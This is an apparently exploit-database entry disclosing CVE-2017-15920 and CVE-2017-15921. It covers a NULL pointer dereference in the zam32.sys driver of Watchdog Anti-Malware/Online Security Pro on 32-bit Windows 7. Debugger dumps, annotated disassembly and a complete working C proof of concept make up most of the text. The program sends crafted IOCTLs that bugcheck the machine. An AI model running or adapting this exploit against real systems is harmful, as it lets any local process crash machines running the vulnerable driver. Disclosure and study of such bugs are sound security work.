"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference"

Author

"Parvez Anwar"

Platform

windows

Release date

2017-10-26

/*

Exploit Title    - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
Date             - 26th October 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.watchdogdevelopment.com/
Tested Version   - 2.74.186.150
Driver Version   - 2.21.63 - zam32.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE IDs          - CVE-2017-15920 and CVE-2017-15921
Vendor fix url   - Will be fixed in a future release
Fixed Version    - n/a
Fixed driver ver - n/a



A NULL pointer dereference is triggered by sending IOCTL 0x80002010 or 0x80002054 to
the driver's control device with a NULL input buffer and an input length of 0. Both
codes use METHOD_BUFFERED (the low two bits of each code are 0), so with zero-length
input and output the I/O manager leaves Irp->AssociatedIrp.SystemBuffer NULL; the
dispatch routine never validates the buffer pointer or the input buffer length before
using it, as the disassembly below shows. The result is a bugcheck (local denial of
service) from any process that can open the device.

kd> dt nt!_irp @esi -r
   +0x000 Type             : 0n6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x60000
   +0x00c AssociatedIrp    : <unnamed-tag>
      +0x000 MasterIrp        : (null) 
      +0x000 IrpCount         : 0n0
      +0x000 SystemBuffer     : (null)  <----------- null pointer


0x80002010
----------
CVE-2017-15921

kd> r
eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
zam32+0xdd9f:
9087cd9f ff30            push    dword ptr [eax]      ds:0023:00000000=????????


.text:90AD9104                 push    offset aIoctl_register                        ; "IOCTL_REGISTER_PROCESS"
.text:90AD9109                 push    0                                             
.text:90AD910B                 push    edx                                           ; Pointer to "DeviceIoControlHandler" string
.text:90AD910C                 push    208h
.text:90AD9111                 push    offset aMain_c                                
.text:90AD9116                 push    1
.text:90AD9118                 call    sub_90AD3ADA
.text:90AD911D                 add     esp, 18h
.text:90AD9120                 push    esi                                           ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer"
.text:90AD9121                 call    sub_90AD8D90

.text:90AD8D90 sub_90AD8D90    proc near                                             
.text:90AD8D90
.text:90AD8D90 arg_0           = dword ptr  8
.text:90AD8D90
.text:90AD8D90                 push    ebp                                           
.text:90AD8D91                 mov     ebp, esp
.text:90AD8D93                 call    sub_90AD414A
.text:90AD8D98                 test    eax, eax
.text:90AD8D9A                 jz      short loc_90AD8DA6
.text:90AD8D9C                 mov     eax, [ebp+arg_0]                              ; Null pointer dereference (only reached when sub_90AD414A returns non-zero, see the jz above)
.text:90AD8D9F                 push    dword ptr [eax]                               ; BSOD !!!!
.text:90AD8DA1                 call    sub_90AD428C
.text:90AD8DA6
.text:90AD8DA6 loc_90AD8DA6:                                                         
.text:90AD8DA6                 pop     ebp
.text:90AD8DA7                 retn    4
.text:90AD8DA7 sub_90AD8D90    endp
.text:90AD8DA7
.text:90AD8DAA


0x80002054
----------
CVE-2017-15920

kd> r
eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
zam32+0xe41a:
9087d41a c7061e010000    mov     dword ptr [esi],11Eh ds:0023:00000000=????????


.text:90AD9401                 push    offset aIoctl_get_driv                        ; IOCTL_GET_DRIVER_PROTOCOL
.text:90AD9406                 push    0
.text:90AD9408                 push    edx
.text:90AD9409                 push    2A3h
.text:90AD940E                 push    offset aMain_c                                
.text:90AD9413                 push    1
.text:90AD9415                 call    sub_90AD3ADA
.text:90AD941A                 mov     dword ptr [esi], 11Eh                         ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer"
.text:90AD9420                 jmp     loc_90AD9622


*/


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <conio.h>

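/*
 * Entry point for the PoC.
 *
 * Opens the zam32.sys control device and sends one of the two affected
 * IOCTLs with a NULL input buffer and a zero input length.  On a vulnerable
 * driver the IRP's SystemBuffer is NULL and the kernel dereferences it, so
 * the machine bugchecks and this process never returns from DeviceIoControl.
 * If DeviceIoControl does return, the driver survived the request (patched,
 * a different version, or - for 0x80002010 - the sub_90AD414A check took the
 * non-dereferencing branch) and that outcome is reported instead of the old
 * unconditional "[+] DoSed" message, which was only ever printed when the
 * DoS had NOT happened.
 *
 * Usage: <exe> [ioctl]
 *   ioctl  optional hex control code: 80002010 (default, CVE-2017-15921)
 *          or 80002054 (CVE-2017-15920).  Anything else is rejected so the
 *          tool only ever sends the two documented requests.
 *
 * Returns 0 when the IOCTL completed without a crash, -1 when the argument
 * is invalid, the device could not be opened, or the request was refused.
 */
int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    const char     devhandle[] = "\\\\.\\zemanaantimalware";   /* fixed literal, no formatting needed */
    DWORD          dwRetBytes = 0;
    DWORD          dwIoctl = 0x80002010;                        /* CVE-2017-15921 by default */

    if (argc > 1)
    {
        char *end = NULL;
        unsigned long code = strtoul(argv[1], &end, 16);

        /* Only the two codes documented above are known to hit the NULL
           SystemBuffer path; refuse anything else rather than poke the
           driver with arbitrary control codes. */
        if (end == argv[1] || *end != '\0' ||
            (code != 0x80002010UL && code != 0x80002054UL))
        {
            printf("\n[-] Usage: %s [80002010|80002054]\n\n", argv[0]);
            return -1;
        }
        dwIoctl = (DWORD)code;
    }

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        /* The Win32 error code distinguishes "device not present" from
           "access denied", which matters when checking who can reach it. */
        printf("\n[-] Open %s device failed (error %lu)\n\n", devhandle, GetLastError());
        return -1;
    }
    printf("\n[+] Open %s device successful", devhandle);

    printf("\n[~] Press any key to continue . . .");
    getch();

    printf("\n[*] Sending IOCTL 0x%08lx with NULL input buffer, input length 0", (unsigned long)dwIoctl);

    /* NULL input buffer and zero length: with METHOD_BUFFERED the I/O manager
       leaves Irp->AssociatedIrp.SystemBuffer NULL and the driver dereferences
       it without checking.  A vulnerable driver never returns from this call. */
    if (!DeviceIoControl(hDevice, dwIoctl, NULL, 0, NULL, 0, &dwRetBytes, NULL))
    {
        printf("\n[-] DeviceIoControl failed (error %lu) - request rejected, driver may be patched\n\n", GetLastError());
        CloseHandle(hDevice);
        return -1;
    }

    /* Reaching this line means no bugcheck occurred. */
    printf("\n[!] DeviceIoControl returned without a crash - driver appears not to be affected\n\n");
 
    CloseHandle(hDevice);
    return 0;
}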